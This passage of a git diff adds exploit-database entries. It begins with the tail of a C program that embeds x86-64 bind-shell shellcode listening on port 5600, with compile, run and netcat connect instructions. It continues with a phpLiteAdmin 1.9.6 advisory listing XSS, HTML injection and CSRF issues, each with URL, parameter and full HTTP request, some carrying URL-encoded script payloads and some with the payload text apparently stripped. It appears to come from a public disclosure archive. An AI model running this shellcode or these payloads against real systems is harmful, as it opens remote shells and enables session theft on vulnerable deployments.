4000d4: 0f 05 syscall + +--------------------------------------------------------------------------------------------------- + +How To Run + +$ gcc -o bind_shell bind_shell.c +$ execstack -s sh_shell +$ ./sh_shell + +How to Connect + +$ nc 5600 + +Eg: + +$ nc 127.0.0.1 5600 + +--------------------------------------------------------------------------------------------------- +*/ +#include +char sh[]="\x48\x31\xc0\x48\x31\xf6\x99\x6a\x29\x58\xff\xc6\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x50\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x31\xc0\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x6a\x3b\x58\x0f\x05"; +void main(int argc, char **argv) +{ + int (*func)(); + func = (int (*)()) sh; + (int)(*func)(); +} diff --git a/platforms/php/webapps/39714.txt b/platforms/php/webapps/39714.txt new file mode 100755 index 000000000..feffe3186 --- /dev/null +++ b/platforms/php/webapps/39714.txt 
@@ -0,0 +1,767 @@
+#################################################################################################################################################
+# Exploit Title: phpLiteAdmin v1.9.6 - Multiple Vulnerabilities
+# Date: 20.04.2016
+# Exploit Author: Ozer Goker
+# Vendor Homepage: https://www.phpliteadmin.org
+# Software Link:
+https://bitbucket.org/phpliteadmin/public/downloads/phpLiteAdmin_v1-9-6.zip
+# Version: 1.9.6
+#################################################################################
+
+Introduction
+phpLiteAdmin is a web-based SQLite database admin tool written in PHP with
+support for SQLite3 and SQLite2. source = https://www.phpliteadmin.org
+
+
+Vulnerabilities: CSRF | HTML(or Iframe) Injection | XSS
+
+
+XSS details:
+#################################################################################
+
+XSS1
+
+URL
+http://localhost/phpliteadmin/phpliteadmin.php?action=table_create&confirm=1
+
+METHOD
+Post
+
+PARAMETER
+0_defaultoption
+
+PAYLOAD
+">
+
+Request
+POST /phpliteadmin/phpliteadmin.php?action=table_create&confirm=1 HTTP/1.1
+
+tablename=testtable&rows=2&0_field=id&0_type=INTEGER&0_defaultoption=defined">&0_defaultvalue=1&1_field=name&1_type=INTEGER&1_defaultoption=defined&1_defaultvalue=test
+
+#################################################################################
+
+XSS2
+
+URL
+http://localhost/phpliteadmin/phpliteadmin.php?view=import
+
+METHOD
+Post
+
+PARAMETER
+file
+
+PAYLOAD
+">
+
+Request
+POST /phpliteadmin/phpliteadmin.php?view=import HTTP/1.1
+
+Content-Type: multipart/form-data;
+boundary=---------------------------1675024292505
+Content-Length: 1124
+
+-----------------------------1675024292505
+Content-Disposition: form-data; name="import_type"
+
+sql
+-----------------------------1675024292505
+Content-Disposition: form-data; name="single_table"
+
+testtable
+-----------------------------1675024292505
+Content-Disposition: form-data; name="import_csv_fieldsterminated"
+
+;
+-----------------------------1675024292505
+Content-Disposition: form-data; name="import_csv_fieldsenclosed"
+
+"
+-----------------------------1675024292505
+Content-Disposition: form-data; name="import_csv_fieldsescaped"
+
+\
+-----------------------------1675024292505
+Content-Disposition: form-data; name="import_csv_replacenull"
+
+NULL
+-----------------------------1675024292505
+Content-Disposition: form-data; name="import_csv_fieldnames"
+
+on
+-----------------------------1675024292505
+Content-Disposition: form-data; name="file"; filename="test"
+Content-Type: text/plain
+
+">
+-----------------------------1675024292505
+Content-Disposition: form-data; name="import"
+
+Import
+-----------------------------1675024292505--
+
+
+#################################################################################
+
+XSS3
+
+URL
+http://localhost/phpliteadmin/phpliteadmin.php?view=sql
+
+METHOD
+Post
+
+PARAMETER
+queryval
+
+PAYLOAD
+">
+
+Request
+POST /phpliteadmin/phpliteadmin.php?view=sql HTTP/1.1
+
+queryval=%22%3E%3Cscript%3Ealert%283%29%3C%2Fscript%3E&delimiter=%3B&query=Go
+
+#################################################################################
+
+XSS4
+
+URL
+http://localhost/phpliteadmin/phpliteadmin.php?action=view_create&confirm=1
+
+METHOD
+Post
+
+PARAMETER
+select
+
+PAYLOAD
+">
+
+Request
+POST /phpliteadmin/phpliteadmin.php?action=view_create&confirm=1 HTTP/1.1
+
+viewname=test&select=">&createtable=Go
+
+#################################################################################
+
+XSS5
+
+URL
+http://localhost/phpliteadmin/phpliteadmin.php?action=view_drop&confirm=1
+
+METHOD
+Post
+
+PARAMETER
+viewname
+
+PAYLOAD
+
+
+Request
+POST /phpliteadmin/phpliteadmin.php?action=view_drop&confirm=1 HTTP/1.1
+
+viewname=test
+
+
+#################################################################################
+
+XSS6
+
+URL
+http://localhost/phpliteadmin/phpliteadmin.php?action=row_view&table=testtable
+
+METHOD
+Post
+
+PARAMETER
+numRows
+
+PAYLOAD
+'>
+
+Request
+POST /phpliteadmin/phpliteadmin.php?action=row_view&table=testtable HTTP/1.1
+
+show=Show+%3A+&numRows=30%27%3E%3Cscript%3Ealert%286%29%3C%2Fscript%3E&startRow=0&viewtype=table
+
+#################################################################################
+
+XSS7
+
+URL
+http://localhost/phpliteadmin/phpliteadmin.php?table=testtable&action=column_confirm&action2=%27%3E%3Cscript%3Ealert%287%29%3C/script%3E&pk=id
+
+METHOD
+Get
+
+PARAMETER
+action2
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS8
+
+URL
+http://localhost/phpliteadmin/phpliteadmin.php?action=table_create&confirm=1
+
+METHOD
+Post
+
+PARAMETER
+tablename
+
+PAYLOAD
+%3cscript%3ealert(8)%3c%2fscript%3e
+
+Request
+POST /phpliteadmin/phpliteadmin.php?action=table_create&confirm=1 HTTP/1.1
+
+tablename=testtable%3cscript%3ealert(8)%3c%2fscript%3e&rows=2&0_field=id&0_type=INTEGER&0_defaultoption=defined&0_defaultvalue=1&1_field=name&1_type=INTEGER&1_defaultoption=defined&1_defaultvalue=test
+
+#################################################################################
+
+XSS9
+
+URL
+http://localhost/phpliteadmin/phpliteadmin.php?action=table_rename&confirm=1
+
+METHOD
+Post
+
+PARAMETER
+oldname
+
+PAYLOAD
+
+
+Request
+POST /phpliteadmin/phpliteadmin.php?action=table_rename&confirm=1 HTTP/1.1
+
+oldname=testtable&newname=test&rename=Rename
+
+#################################################################################
+
+
+HTML Injection details:
+#################################################################################
+
+HTML Injection1
+
+URL
+http://localhost/phpliteadmin/phpliteadmin.php?action=table_create&confirm=1
+METHOD
+Post
+
+PARAMETER
+0_defaultoption
+
+PAYLOAD
+">